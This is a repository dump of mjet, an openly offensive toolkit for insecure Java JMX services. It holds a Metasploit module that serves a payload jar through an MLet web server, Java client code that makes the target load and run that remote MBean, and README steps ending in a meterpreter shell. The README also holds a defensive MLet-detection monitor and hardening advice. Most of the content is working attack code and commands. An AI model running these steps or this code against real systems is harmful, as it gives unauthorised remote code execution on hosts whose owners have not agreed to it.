Repository: mogwaisec/mjet
Branch: master
Commit: 20210c1286a9
Files: 15
Total size: 14.5 KB
Directory structure:
gitextract_d35drckt/
├── LICENSE
├── README.md
├── metasploit/
│   └── java_mlet_server.rb
├── mjet.jar
└── src/
    └── java/
        ├── metasploit/
        │   └── MetasploitBean/
        │       ├── .classpath
        │       ├── .project
        │       ├── .settings/
        │       │   └── org.eclipse.jdt.core.prefs
        │       └── src/
        │           └── metasploit/
        │               ├── Metasploit.java
        │               ├── MetasploitMBean.java
        │               └── Payload.java
        └── mjet/
            ├── .classpath
            ├── .project
            ├── .settings/
            │   └── org.eclipse.jdt.core.prefs
            ├── lib/
            │   └── commons-cli-1.2.jar
            └── src/
                └── de/
                    └── mogwaisecurity/
                        └── lab/
                            └── mjet/
                                └── Mjet.java
================================================
FILE CONTENTS
================================================
================================================
FILE: LICENSE
================================================
The MIT License (MIT)
Copyright (c) 2015 Mogwai Security
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================
FILE: README.md
================================================
# mjet
Mogwai Security Java Management Extensions (JMX) Exploitation Toolkit

mjet is a tool that can be used to protect insecurely configured JMX services. It is based on
the blog post "Exploiting JMX-RMI" by Braden Thomas/Accuvant (http://www.accuvant.com/blog/exploiting-jmx-rmi)
and can be used to execute arbitrary Metasploit payloads on the target system.

Mjet was originally planned to be a complete attack toolkit. However, we noticed that the Metasploit GitHub repository contains
a pull request which will provide basic Java RMI/serialization support in native Ruby. This is awesome and removes the Java
dependency. So we stopped developing this tool and will create Metasploit modules in the near future.

mjet consists of the following parts:
- A Metasploit module which emulates an "MLet server". This is basically a web server which hosts an HTML file that contains an mlet tag
- A ManagedBean that is changed by the MLet server module to include the selected payload
- A jar archive that is used to contact the insecure JMX service.

### Installation (with the github version of Metasploit)
- Copy the "MBean" folder to "data/java/metasploit"
- Copy java_mlet_server.rb to "modules/exploits/multi/misc/"
### Usage
The example uses the following systems:
- attacker: 192.168.178.1
- target: 192.168.178.200, JMX service running on TCP port 1616

Configure/start the Metasploit module "java_mlet_server". The module will run as a background job:
```
msf > use exploit/multi/misc/java_mlet_server
msf > set LHOST 192.168.178.1
msf > set SRVHOST 192.168.178.1
msf > set URIPATH /mlet/
msf > run
```
Use mjet.jar to connect to the vulnerable JMX service and provide the URL to the MLet Web server...
```
java -jar mjet.jar -t 192.168.178.200 -p 1616 -u http://192.168.178.1:8080/mlet/
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
---------------------------------------------------
[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.178.200:1616/jmxrmi ...
[+] Connected: rmi://192.168.178.164 5
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.178.1:8080/mlet/
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: ptIIirfM:name=BlPwaoHu,id=oWTqfkbE
[+] Invoking: metasploit.Metasploit.run()
[+] Done
```
and enjoy your meterpreter shell :-)
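
The client output above shows two server-side events a defender can watch for: an MBean of class `javax.management.loading.MLet` being created, followed by `getMBeansFromURL`. The following is an added example, not part of the mjet repository, that raises an alert inside the monitored JVM when an MLet MBean is registered; the class name `MLetRegistrationMonitor` and the `demo:type=MLet` object name are hypothetical.

```java
import java.lang.management.ManagementFactory;
import java.util.List;
import java.util.concurrent.CopyOnWriteArrayList;
import javax.management.MBeanServer;
import javax.management.MBeanServerDelegate;
import javax.management.MBeanServerNotification;
import javax.management.Notification;
import javax.management.NotificationListener;
import javax.management.ObjectName;
import javax.management.ReflectionException;

/** Added example: flags MLet MBeans that appear in this JVM's MBean server. */
public class MLetRegistrationMonitor implements NotificationListener {
    // Class that the client flow above instantiates before calling getMBeansFromURL.
    private static final String MLET_CLASS = "javax.management.loading.MLet";

    private final MBeanServer server;
    private final List<String> alerts = new CopyOnWriteArrayList<String>();

    public MLetRegistrationMonitor(MBeanServer server) throws Exception {
        this.server = server;
        // The delegate MBean broadcasts every MBean registration and unregistration.
        server.addNotificationListener(MBeanServerDelegate.DELEGATE_NAME, this, null, null);
    }

    @Override
    public void handleNotification(Notification n, Object handback) {
        if (!(n instanceof MBeanServerNotification)
                || !MBeanServerNotification.REGISTRATION_NOTIFICATION.equals(n.getType())) {
            return; // only registrations are of interest
        }
        ObjectName name = ((MBeanServerNotification) n).getMBeanName();
        try {
            // isInstanceOf also matches subclasses of MLet, not only the exact class name.
            if (server.isInstanceOf(name, MLET_CLASS)) {
                String alert = "MLet MBean registered: " + name;
                alerts.add(alert);
                System.err.println("[ALERT] " + alert);
            }
        } catch (Exception e) {
            // The MBean was removed again before it could be inspected; nothing to report.
        }
    }

    public List<String> getAlerts() {
        return alerts;
    }

    public static void main(String[] args) throws Exception {
        MBeanServer mbs = ManagementFactory.getPlatformMBeanServer();
        MLetRegistrationMonitor monitor = new MLetRegistrationMonitor(mbs);
        // Constructed trigger: register an MLet locally to exercise the monitor.
        try {
            mbs.createMBean(MLET_CLASS, new ObjectName("demo:type=MLet"));
        } catch (ReflectionException e) {
            System.out.println("This JDK does not provide " + MLET_CLASS);
        }
        System.out.println("alerts: " + monitor.getAlerts());
    }
}
```

Detection of this kind is a backstop. The flow depends on the JMX connector accepting clients without credentials, so requiring authentication (`com.sun.management.jmxremote.authenticate=true` with password and access files) and restricting network access to the JMX port is the primary fix.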
================================================
FILE: metasploit/java_mlet_server.rb
================================================
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize( info = {} )
    super( update_info( info,
      'Name'          => 'Java Mlet Server',
      'Description'   => %q{
          This module abuses the JMX classes from a Java Applet to run arbitrary Java
        code outside of the sandbox as exploited in the wild in January of 2013. The
        vulnerability affects Java version 7u10 and earlier.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Unknown', # Vulnerability discovery
          'egypt', # Metasploit module
          'sinn3r', # Metasploit module
          'juan vazquez' # Metasploit module
        ],
      'References'    =>
        [
          [ 'CVE', '2013-0422' ]
        ],
      'Platform'      => %w{ java linux osx win },
      'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'       =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA,
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 10 2013'
    ))
  end

  def setup
    path = File.join(Msf::Config.data_directory, "java", "metasploit", "MBean", "Metasploit.class")
    @mbean_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.data_directory, "java", "metasploit", "MBean", "MetasploitMBean.class")
    @interface_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    #@exploit_class_name = rand_text_alpha("Exploit".length)
    #@exploit_class.gsub!("Exploit", @exploit_class_name)
    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("metasploit/Metasploit.class", @mbean_class)
      jar.add_file("metasploit/MetasploitMBean.class", @interface_class)
      #metasploit_str = rand_text_alpha("metasploit".length)
      #payload_str = rand_text_alpha("payload".length)
      #jar.entries.each { |entry|
      #  entry.name.gsub!("metasploit", metasploit_str)
      #  entry.name.gsub!("Payload", payload_str)
      #  entry.data = entry.data.gsub("metasploit", metasploit_str)
      #  entry.data = entry.data.gsub("Payload", payload_str)
      #}
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_html
    html = %Q|<mlet code=metasploit.Metasploit archive=#{rand_text_alpha(8)}.jar name=#{rand_text_alpha(8)}:name=#{rand_text_alpha(8)},id=#{rand_text_alpha(8)} ></mlet>|
    # return html
  end

end
================================================
FILE: src/java/metasploit/MetasploitBean/.classpath
================================================
<?xml version="1.0" encoding="UTF-8"?>
<classpath>
<classpathentry kind="src" path="src"/>
<classpathentry kind="con" path="org.eclipse.jdt.launching.JRE_CONTAINER/org.eclipse.jdt.internal.debug.ui.launcher.StandardVMType/JavaSE-1.6"/>
<classpathentry kind="output" path="bin"/>
</classpath>
================================================
FILE: src/java/metasploit/MetasploitBean/.project
================================================
<?xml version="1.0" encoding="UTF-8"?>
<projectDescription>
<name>MetasploitBean</name>
<comment></comment>
<projects>
</projects>
<buildSpec>
<buildCommand>
<name>org.eclipse.jdt.core.javabuilder</name>
<arguments>
</arguments>
</buildCommand>
</buildSpec>
<natures>
<nature>org.eclipse.jdt.core.javanature</nature>
</natures>
</projectDescription>
================================================
FILE: src/java/metasploit/MetasploitBean/.settings/org.eclipse.jdt.core.prefs
================================================
eclipse.preferences.version=1
org.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled
org.eclipse.jdt.core.compiler.codegen.targetPlatform=1.6
org.eclipse.jdt.core.compiler.codegen.unusedLocal=preserve
org.eclipse.jdt.core.compiler.compliance=1.6
org.eclipse.jdt.core.compiler.debug.lineNumber=generate
org.eclipse.jdt.core.compiler.debug.localVariable=generate
org.eclipse.jdt.core.compiler.debug.sourceFile=generate
org.eclipse.jdt.core.compiler.problem.assertIdentifier=error
org.eclipse.jdt.core.compiler.problem.enumIdentifier=error
org.eclipse.jdt.core.compiler.source=1.6
================================================
FILE: src/java/metasploit/MetasploitBean/src/metasploit/Metasploit.java
================================================
package metasploit;

public class Metasploit implements MetasploitMBean {
    public void run() {
        Payload.main(null);
    }
}
================================================
FILE: src/java/metasploit/MetasploitBean/src/metasploit/MetasploitMBean.java
================================================
package metasploit;

public interface MetasploitMBean {
    public void run();
}
================================================
FILE: src/java/metasploit/MetasploitBean/src/metasploit/Payload.java
================================================
package metasploit;

public class Payload {

    public static void main(String[] args) {
        System.out.println("bla bla bla");
    }
}
================================================
FILE: src/java/mjet/.classpath
================================================
<?xml version="1.0" encoding="UTF-8"?>
<classpath>
<classpathentry kind="src" path="src"/>
<classpathentry kind="con" path="org.eclipse.jdt.launching.JRE_CONTAINER/org.eclipse.jdt.internal.debug.ui.launcher.StandardVMType/JavaSE-1.6"/>
<classpathentry kind="lib" path="lib/commons-cli-1.2.jar"/>
<classpathentry kind="output" path="bin"/>
</classpath>
================================================
FILE: src/java/mjet/.project
================================================
<?xml version="1.0" encoding="UTF-8"?>
<projectDescription>
<name>mjet</name>
<comment></comment>
<projects>
</projects>
<buildSpec>
<buildCommand>
<name>org.eclipse.jdt.core.javabuilder</name>
<arguments>
</arguments>
</buildCommand>
</buildSpec>
<natures>
<nature>org.eclipse.jdt.core.javanature</nature>
</natures>
</projectDescription>
================================================
FILE: src/java/mjet/.settings/org.eclipse.jdt.core.prefs
================================================
eclipse.preferences.version=1
org.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled
org.eclipse.jdt.core.compiler.codegen.targetPlatform=1.6
org.eclipse.jdt.core.compiler.codegen.unusedLocal=preserve
org.eclipse.jdt.core.compiler.compliance=1.6
org.eclipse.jdt.core.compiler.debug.lineNumber=generate
org.eclipse.jdt.core.compiler.debug.localVariable=generate
org.eclipse.jdt.core.compiler.debug.sourceFile=generate
org.eclipse.jdt.core.compiler.problem.assertIdentifier=error
org.eclipse.jdt.core.compiler.problem.enumIdentifier=error
org.eclipse.jdt.core.compiler.source=1.6
================================================
FILE: src/java/mjet/src/de/mogwaisecurity/lab/mjet/Mjet.java
================================================
package de.mogwaisecurity.lab.mjet;

import org.apache.commons.cli.*;
import javax.management.remote.*;
import javax.management.*;
import java.util.*;

public class Mjet {

    /**
     * @param args
     */
    public static void main(String[] args) {

        System.out.println("---------------------------------------------------");
        System.out.println("MJET - Mogwai Security JMX Exploitation Toolkit 0.1");
        System.out.println("---------------------------------------------------");
        System.out.println();

        CommandLineParser parser = new org.apache.commons.cli.BasicParser();
        Options cmdOptions = createCmdOptions();
        CommandLine cmd= null;

        try {
            cmd = parser.parse(cmdOptions, args);
        }
        catch(ParseException exp) {
            System.err.println( "[-] Error: " + exp.getMessage());
            System.err.println();

            // automatically generate the help statement
            HelpFormatter formatter = new HelpFormatter();
            formatter.printHelp( "mjet", cmdOptions );
            System.exit(1);
        }

        pwnJMXService(cmd);
    }

    private static Options createCmdOptions()
    {
        Options cmdOptions = new Options();

        // Required arguments
        Option targetOption = OptionBuilder.withArgName("host").hasArg().withDescription("target host").isRequired(true).create('t');
        Option portOption = OptionBuilder.withArgName("port").hasArg().withDescription("target service port").isRequired(true).create('p');
        Option urlOption = OptionBuilder.withArgName("url").hasArg().withDescription("url of the mlet web server").isRequired(true).create('u');

        targetOption.setLongOpt("target");
        portOption.setLongOpt("port");
        urlOption.setLongOpt("url");

        cmdOptions.addOption(targetOption);
        cmdOptions.addOption(portOption);
        cmdOptions.addOption(urlOption);

        // Optional arguments
        Option helpOption = new Option("help", false, "show this help");
        cmdOptions.addOption(helpOption);

        return cmdOptions;
    }

    static void pwnJMXService(CommandLine line) {
        try {
            String serverName = line.getOptionValue("t");
            String servicePort = line.getOptionValue("p");
            String mLetUrl = line.getOptionValue("u");

            JMXServiceURL url = new JMXServiceURL("service:jmx:rmi:///jndi/rmi://" + serverName + ":" + servicePort + "/jmxrmi");

            System.out.println("[+] Connecting to JMX URL: "+url +" ...");

            JMXConnector connector = JMXConnectorFactory.connect(url);
            MBeanServerConnection mBeanServer = connector.getMBeanServerConnection();

            System.out.println("[+] Connected: " + connector.getConnectionId());

            ObjectInstance payloadBean = null;

            System.out.println("[+] Trying to create MLet bean...");
            ObjectInstance mLetBean = null;

            try {
                mLetBean = mBeanServer.createMBean("javax.management.loading.MLet", null);
            } catch (javax.management.InstanceAlreadyExistsException e) {
                mLetBean = mBeanServer.getObjectInstance(new ObjectName("DefaultDomain:type=MLet"));
            }

            System.out.println("[+] Loaded "+mLetBean.getClassName());
            System.out.println("[+] Loading malicious MBean from " + mLetUrl);
            System.out.println("[+] Invoking: "+mLetBean.getClassName() + ".getMBeansFromURL");

            Object res = mBeanServer.invoke(mLetBean.getObjectName(), "getMBeansFromURL",
                    new Object[] { mLetUrl },
                    new String[] { String.class.getName() }
            );

            HashSet res_set = ((HashSet)res);
            Iterator itr = res_set.iterator();
            Object nextObject = itr.next();

            if (nextObject instanceof Exception) {
                throw ((Exception)nextObject);
            }

            payloadBean = ((ObjectInstance)nextObject);

            System.out.println("[+] Loaded class: "+ payloadBean.getClassName());
            System.out.println("[+] Loaded MBean Server ID: "+ payloadBean.getObjectName());
            System.out.println("[+] Invoking: "+ payloadBean.getClassName()+".run()");

            mBeanServer.invoke(payloadBean.getObjectName(), "run", new Object[]{}, new String[]{});

            System.out.println("[+] Done");

        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
SYMBOL INDEX (15 symbols across 5 files)
FILE: metasploit/java_mlet_server.rb
class Metasploit3 (line 9) | class Metasploit3 < Msf::Exploit::Remote
method initialize (line 14) | def initialize( info = {} )
method setup (line 71) | def setup
method on_request_uri (line 82) | def on_request_uri(cli, request)
method generate_html (line 115) | def generate_html
FILE: src/java/metasploit/MetasploitBean/src/metasploit/Metasploit.java
class Metasploit (line 4) | public class Metasploit implements MetasploitMBean {
method run (line 5) | public void run() {
FILE: src/java/metasploit/MetasploitBean/src/metasploit/MetasploitMBean.java
type MetasploitMBean (line 3) | public interface MetasploitMBean {
method run (line 4) | public void run();
FILE: src/java/metasploit/MetasploitBean/src/metasploit/Payload.java
class Payload (line 3) | public class Payload {
method main (line 6) | public static void main(String[] args) {
FILE: src/java/mjet/src/de/mogwaisecurity/lab/mjet/Mjet.java
class Mjet (line 9) | public class Mjet {
method main (line 14) | public static void main(String[] args) {
method createCmdOptions (line 43) | private static Options createCmdOptions()
method pwnJMXService (line 67) | static void pwnJMXService(CommandLine line) {